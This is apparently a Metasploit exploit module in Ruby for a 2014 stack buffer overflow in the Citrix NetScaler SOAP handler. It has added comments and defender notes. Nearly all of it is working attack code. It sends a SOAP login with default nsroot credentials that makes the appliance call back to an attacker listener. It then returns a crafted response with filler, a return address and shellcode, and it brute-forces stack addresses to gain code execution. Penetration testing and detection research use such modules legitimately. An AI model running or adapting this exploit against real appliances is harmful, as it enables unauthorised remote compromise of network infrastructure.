Path: blob/master/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Citrix NetScaler SOAP handler (see 'Description' below).
#
# Three mixins shape the flow:
#   - HttpClient:  sends the SOAP login request to TARGETURI on the appliance.
#   - TcpServer:   listens on SRVHOST:SRVPORT; the appliance connects back to it
#                  as if it were a NetScaler config server, and on_client_data
#                  answers that connection with the crafted response.
#   - Brute:       when the fixed 'Ret' does not yield a session, iterates the
#                  'Bruteforce' range of return addresses via brute_exploit.
#
# Defender notes (derived from the request/response built in this file):
#   - The trigger on the wire is an HTTP POST to the SOAP path (default /soap)
#     whose body is a urn:NSConfig <login> with fixed credentials and with
#     <clientip>/<ns> pointing at an external host.
#   - The appliance then opens an outbound TCP connection to that host (default
#     port 3010); the response it receives starts with a 2-byte length and the
#     marker bytes \x00\x00\xa5\xa5.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Brute

  # Registers module metadata, the single target and the datastore options.
  #
  # @param info [Hash] module info merged by update_info.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Citrix NetScaler SOAP Handler Remote Code Execution",
      'Description' => %q{
This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
The vulnerability exists in the SOAP handler, accessible through the web interface. A
malicious SOAP requests can force the handler to connect to a malicious NetScaler config
server. This malicious config server can send a specially crafted response in order to
trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
code with the privileges of the web server running the SOAP handler. This module has been
tested successfully on the NetScaler Virtual Appliance 450010.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Bradley Austin', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'MinNops' => 512,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Arch' => ARCH_X86,
      'Platform' => 'bsd',
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Targets' =>
        [
          [ 'NetScaler Virtual Appliance 450010',
            {
              # Target-specific constants consumed by on_client_data below.
              'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, this makes sense.
              'Offset' => 606,      # bytes of filler placed before the return address
              'Ret' => 0xffffda94,  # Try before bruteforce...
              # The virtual appliance lacks security mitigations like DEP/ASLR, and since the
              # process being exploited is an apache child, the bruteforce attack works fine
              # here.
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
                  'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack
                  'Step' => 256
                }
            }
          ],
        ],
      'DisclosureDate' => '2014-09-22',
      'DefaultTarget' => 0))

    # SRVHOST has no default on purpose: it is interpolated into the SOAP body and
    # must be an address the appliance can reach (see the check in #exploit).
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
        OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),
        OptPort.new('SRVPORT', [true, "The local port to listen on.", 3010])
      ])
  end


  # Fingerprints the SOAP handler with a bodiless GET.
  #
  # @return [Exploit::CheckCode] Detected when the handler answers 200 with its
  #   "Server Request Handler ... No body received" page, Unknown otherwise
  #   (including when no response arrives at all).
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })

    if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  # Main entry point: validates configuration, starts the listener, tries the
  # fixed return address once, then falls back to the Brute mixin's loop.
  #
  # @raise via fail_with when SRVHOST is a wildcard/loopback address or when
  #   #check does not report Detected.
  def exploit
    # The appliance connects back to SRVHOST, so a wildcard or loopback address
    # can never work from its point of view.
    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
    end

    if check != Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
    end

    # Listener must be up before the SOAP request is sent, because the
    # appliance connects out to it as a result of that request.
    start_service

    if target.ret
      @curr_ret = target.ret
      send_request_soap
      # Give the callback and the resulting session a few seconds to appear
      # before bruteforcing.
      Rex.sleep(3)

      if session_created?
        return
      end
    end

    # Hands off to Msf::Exploit::Brute, which calls #brute_exploit for each step
    # of the target's 'Bruteforce' range.
    super
  end

  # Brute mixin callback: one attempt with the supplied return address.
  #
  # @param addrs [Hash] current step; only 'Ret' is read.
  def brute_exploit(addrs)
    @curr_ret = addrs['Ret']
    send_request_soap
  end

  # Sends the SOAP login request that makes the handler connect back to
  # SRVHOST. Both <clientip> and <ns> carry SRVHOST; the credentials in the
  # body are fixed literals (whether the handler validates them before
  # connecting out is not visible here).
  #
  # The call uses a 1-second timeout: the HTTP response is not needed, only
  # the side effect (the connection arriving at on_client_data).
  def send_request_soap
    soap = <<-EOS
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns7744:login xmlns:ns7744="urn:NSConfig">
<username xsi:type="xsd:string">nsroot</username>
<password xsi:type="xsd:string">nsroot</password>
<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
</ns7744:login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
    EOS

    print_status("Sending soap request...")

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'data' => soap
    }, 1)
  end

  # TcpServer callback: handles one inbound connection from the appliance.
  #
  # Reads the client's request (2-byte little-endian length, then the body,
  # whose first 4 bytes are expected to be 0xa5a50000) and answers with the
  # crafted response, then closes the connection.
  #
  # Response layout written to the socket (all lengths little-endian):
  #   [u16 total_len = payload_len + 6][\x00\x00\xa5\xa5][filler(Offset)][u32 Ret][u32 RwPtr][payload]
  #
  # NOTE(review): both unpack calls assume data actually arrived; if get_once
  # returns nil (peer sent nothing, or fewer than 2 bytes), the next line raises
  # NoMethodError inside the server callback — confirm get_once's nil behaviour.
  # A req_length below 2 would likewise pass a negative size to get_once.
  #
  # @param c [Rex::Socket] the accepted client connection.
  def on_client_data(c)
    print_status("#{c.peerhost} - Getting request...")

    data = c.get_once(2)
    req_length = data.unpack("v")[0]

    # Length field counts its own 2 bytes, hence the -2.
    req_data = c.get_once(req_length - 2)
    unless req_data.unpack("V")[0] == 0xa5a50000
      print_error("#{c.peerhost} - Incorrect request... sending payload anyway")
    end

    print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")

    # Filler up to the saved return address, then Ret and the target's RwPtr,
    # then the encoded payload (size bounded by 'Space' above).
    my_payload = Rex::Text.pattern_create(target['Offset'])
    my_payload << [@curr_ret, target['RwPtr']].pack("V*")
    my_payload << payload.encoded

    # 6 = 2-byte length field + 4 marker bytes.
    pkt = [my_payload.length + 6].pack("v")
    pkt << "\x00\x00\xa5\xa5"
    pkt << my_payload
    c.put(pkt)
    c.disconnect
  end
end